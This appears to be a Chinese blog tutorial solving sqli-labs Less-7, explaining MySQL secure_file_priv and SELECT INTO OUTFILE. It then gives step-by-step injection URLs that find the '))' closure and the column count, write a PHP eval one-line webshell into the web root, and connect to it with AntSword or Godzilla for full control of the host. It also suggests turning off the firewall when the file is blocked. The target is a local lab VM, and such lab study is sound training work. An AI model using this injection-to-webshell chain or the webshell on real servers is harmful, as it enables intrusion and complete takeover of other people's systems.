SQl注入文件上传及sqli-labs第七关less-7

Sql注入文件上传

1、sql知识基础

secure_file_priv 参数

secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。

secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能导出导入。

secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。
可以使用下面语句查看该值:

show variables like ‘%secure%’;

在这里插入图片描述

secure_file_priv的值可以修改,在MySQL安装路径下的my.ini文件中
在这里插入图片描述

因为此次测试需要读写权限,我将其值修改为我的网站根目录。
在这里插入图片描述
修改之后记得重新启动MySQL服务
然后查询
在这里插入图片描述

2、文件上传语句及条件

into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
在这里插入图片描述
在这个案例中可以把值修改为我们上传的语句,目录修改为我们知道的目标靶机的目录。

3、上传成功条件

1)要有file_priv权限

2)知道网站绝对路径(可以通过报错信息、phpinfo界面、404界面等一些方式知道)

3)要能用union

4)对web目录有写权限

5)select <?php @($\_POST['xx']);?> into outfile “绝对路径/文件名”

3、实验步骤

1)?id=xx union select 1,2,"<?php @($\_POST['xx']);?> into outfile “文件路径”–+

2)蚁剑、哥斯拉连接即可

4、一句话木马

<?php @eval($_POST['password']);?>

password是预留密码,可以自定义,在进行webshell后台登陆工具登录时使用

更多一句话木马了解可以参考一句话木马

5、靶场注入

在这里插入图片描述

5.1 确定注入点及闭合方式

http://192.168.140.130/sq/Less-7/?id=1
http://192.168.140.130/sq/Less-7/?id=2

我们发现页面回显一致,当我们加入单引号,页面报错,存在注入点,将单引号闭合,报错,闭合方式不是单引号,用" ",没有报错,但是使用1=11=2都没有报错,不是双引号报错,用')不对,多次尝试,最后发现使用'))闭合,注释掉不报错,且1=1正确页面,1=2报错
确定闭合方式为'))

5.2 确定列数

http://192.168.140.130/sq/Less-7/?id=1’)) order by 5 --+
http://192.168.140.130/sq/Less-7/?id=1’)) order by 4 --+
http://192.168.140.130/sq/Less-7/?id=1’)) order by 3 --+

order by 3 的时候正确,列数为三

5.3 进行注入

http://192.168.140.130/sq/Less-7/?id=1’)) union select 1,2,3 --+

没有回显,且页面回显提醒我们使用文件注入

5.4 进行文件上传注入

构造一句话上传木马注入语句

http://192.168.140.130/sq/Less-7/?id=1’)) union select 1,“<?php @eval($_POST['pwd']); ?>”,3 into outfile “C:\phpStudy_64\phpstudy_pro\WWW” --+

当我们执行语句页面回显还是报错,但实际已经上传成功。可以在上传目录查看
在这里插入图片描述

有时这个会被防火墙阻挡,可以关闭防火墙或者容许文件存在。
打开查看内容
在这里插入图片描述

5.5 使用webshell工具进行连接

打开webshell工具
添加在这里插入图片描述
url地址因为我是在虚拟机进行的,所以为本地地址,连接密码为一句话木马设置的密码。
连接之后就相当于控制这台电脑了
在这里插入图片描述
至此,注入目标达成,欢迎大家指点评论,互相进步

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/442339.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

深度学习:CycleGAN图像风格迁移转换

目录 基础概念 模型工作流程 循环一致性 几个基本概念 假图像&#xff08;Fake Image&#xff09; 重建图像&#xff08;Reconstructed Image&#xff09; 身份映射图像&#xff08;Identity Mapping Image&#xff09; CyclyGAN损失函数 对抗损失 身份鉴别损失 Cyc…

《Python 安装指南:开启编程之旅》

《Python 安装指南&#xff1a;开启编程之旅》 在当今数字化的时代&#xff0c;编程已经成为一项越来越重要的技能。而 Python 作为一种简洁、高效且功能强大的编程语言&#xff0c;受到了众多开发者的青睐。无论是数据科学、人工智能、Web 开发还是自动化脚本编写&#xff0c…

绕过中间商,不用 input 标签也能搞定文件选择

&#x1f4b0; 点进来就是赚到知识点&#xff01;本文带你用 JS 实现文件选择功能&#xff0c;点赞、收藏、评论更能促进消化吸收&#xff01; &#x1f680; 想解锁更多 Web 文件系统技能吗&#xff1f;快来订阅专栏「Web 玩转文件操作」! &#x1f4e3; 我是 Jax&#xff0c;…

Axure中文版:原型设计新手必备工具,轻松上手!

原型设计是每位产品经理必备的核心技能。通过原型设计&#xff0c;可以提前测试产品与用户之间的交互&#xff0c;发现潜在问题&#xff0c;提升设计效率&#xff0c;节省开发成本。对于移动应用来说&#xff0c;原型相当于产品的说明书&#xff0c;有助于设计师和工程师之间进…

广联达 Linkworks办公OA Service.asmx接口存在信息泄露漏洞

漏洞描述 广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑&#xff0c;提供一百余款基于“端云大数据”产品/服务&#xff0c;提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞&#xff0c;由于某些接口没有鉴权&#xff0c…

计算机网络:物理层 —— 信道复用技术

文章目录 信道信道复用技术信道复用技术的作用基本原理常用的信道复用技术频分复用 FDM时分复用 TDM波分复用 WDM码分复用 CDM码片向量基本原理 信道 信道是指信息传输的通道或介质。在通信中&#xff0c;信道扮演着传输信息的媒介的角色&#xff0c;将发送方发送的信号传递给…

LSTM变种模型

一、GRU 1.概念 GRU&#xff08;门控循环单元&#xff0c;Gated Recurrent Unit&#xff09;是一种循环神经网络&#xff08;RNN&#xff09;的变体&#xff0c;旨在解决标准 RNN 在处理长期依赖关系时遇到的梯度消失问题。GRU 通过引入门控机制简化了 LSTM&#xff08;长短期…

APP测试中ios和androis的区别,有哪些注意点

一、运行机制不同 IOS采用的是沙盒运行机制&#xff0c;安卓采用的是虚拟机运行机制。 1、沙盒机制&#xff1a; 概念&#xff1a;沙盒是一种安全机制&#xff0c;用于防止不同应用之间互相访问 作用&#xff1a;就是存储数据&#xff0c;每个沙盒就相当于每个每个应用的系…

1688商品详情关键词数据-API

要利用 Python 爬虫采集 1688 商品详情数据&#xff0c;需要先了解 1688 网站的页面结构和数据请求方式。一般使用 requests 库请求网站的数据&#xff0c;使用 BeautifulSoup 库解析网页中的数据。 以下是一个简单的 Python 爬虫采集 1688 商品详情数据的示例代码&#xff1a…

红队老子养成记2 - 不想渗透pc?我们来远控安卓!(全网最详细)

大家好&#xff0c;我是Dest1ny。 今天我们是红队专题中的远控安卓。 这个实验会非常有趣&#xff0c;大家多多点赞&#xff01; 环境&#xff1a; 一台有公网ip的vps / kali / 带msf工具即可 一台安卓手机&#xff08;最好老一点&#xff0c;因为我们这里不涉及免杀&#…

typora笔记导出word格式:

Pandoc&#xff1a;各系统下载github链接 https://github.com/jgm/pandoc/releases/latest windows安装包 链接&#xff1a;https://pan.baidu.com/s/17AZNIMImbzFtWJAcAfAB0g?pwd55l2 提取码&#xff1a;55l2 先解压压缩包 点击 设置Pandoc路径&#xff0c;然后选择pa…

如何搭建自己的域名邮箱服务器?Poste.io邮箱服务器搭建教程,Linux+Docker搭建邮件服务器的教程

Linux系统Docker搭建Poste.io电子邮件服务器&#xff0c;搭建属于自己的域名邮箱服务器&#xff0c;可以无限收发电子邮件&#xff08;Email&#xff09;&#xff01; 视频教程&#xff1a;https://www.bilibili.com/video/BV11p1mYaEpM/ 前言 什么是域名邮箱&#xff1f; …

vscode中安装python的包

首先需要调出命令行。然后运行代码&#xff0c;找到你所需要的环境。 PS C:\Users\Administrator\AppData\Local\ESRI\conda\envs\arcgispro-env> conda env list # conda environments: #C:\ProgramData\Anaconda3 base * C:\Users\Administrator\.con…

[C++ 核心编程]笔记 2 栈区和堆区

栈区: 由编译器自动分配释放&#xff0c;存放函数的参数值,同部变量等 注意事项&#xff1a;不要返回局部变量的地址&#xff0c;栈区开辟的数据由编译器自动释放 #define _CRT_SECURE_NO_WARNINGS 1 #include<iostream> using namespace std;//栈区数据注意事项 不要…

让机器来洞察他的内心!

本文所涉及所有资源均在传知代码平台可获取。 目录 洞察你的内心&#xff1a;你真的这么认为吗&#xff1f; 一、研究背景 二、模型结构和代码 D. 不一致性学习网络 E. 多模态讽刺分类 三、数据集介绍 四、性能展示 五、实现过程 1. 下载预训练的 GloVe 词向量&#xff08;Comm…

Hydra 新手友好使用教程

1. Hydra 简介 Hydra是一款强大的网络登录暴力破解工具&#xff0c;支持多种协议。本教程将帮助新手快速上手&#xff0c;掌握常用指令和操作。 2. 基本语法 hydra [参数] 目标 3. 核心参数详解 3.1 用户名和密码设置 单个用户名: -l LOGIN 例&#xff1a;-l admin 用户名…

Redis:事务

Redis&#xff1a;事务 事务事务操作MULTI & EXECDISCARDWATCH 事务 在MySQL中&#xff0c;事务遵循CIRD特性&#xff1a; 原子性&#xff1a;事务是一个整体&#xff0c;要么没有发生&#xff0c;要么已经执行完毕一致性&#xff1a;事务执行前后&#xff0c;数据都要符…

基于Arduino的遥控自平衡小车

基于Arduino的遥控自平衡小车 一、项目简介二、所需材料三、理论支持四、外壳设计五、线路连接六、检查MPU6050连接七、烧录库八、PID控制设置九、设置传感器参数十、无线移动控制十一、超声波模块 一、项目简介 一个使用Arduino Nano、MPU-6050以及便宜的6伏直流齿轮电机的自…

活久见!2024年诺贝尔物理学奖颁给了AI大佬Hinton 和 Hopfield

家人们&#xff01;让我们暂停手中工作&#xff0c;庆祝AI届的科学家首次获得诺贝尔物理学奖&#xff01;&#xff01;&#xff01;&#xff01;&#xff01; 刚刚出炉的热乎消息&#xff1a;今年的诺贝尔物理学奖颁发给了约翰霍普菲尔德 (John Joseph Hopfield)与杰弗里辛顿&a…

充电桩用能计量有序充电服务的探索应用

关键词&#xff1a;云平台&#xff1b;自动检测&#xff1b;能源管理&#xff1b;有序充电 今年&#xff0c;电动汽车行业抓住了疫情影响洼地&#xff0c;迅速找到了发展突破口&#xff0c;从电动汽车发行政策到锂电池开发技术均出台了多层面利好消息&#xff0c;未来一段时间…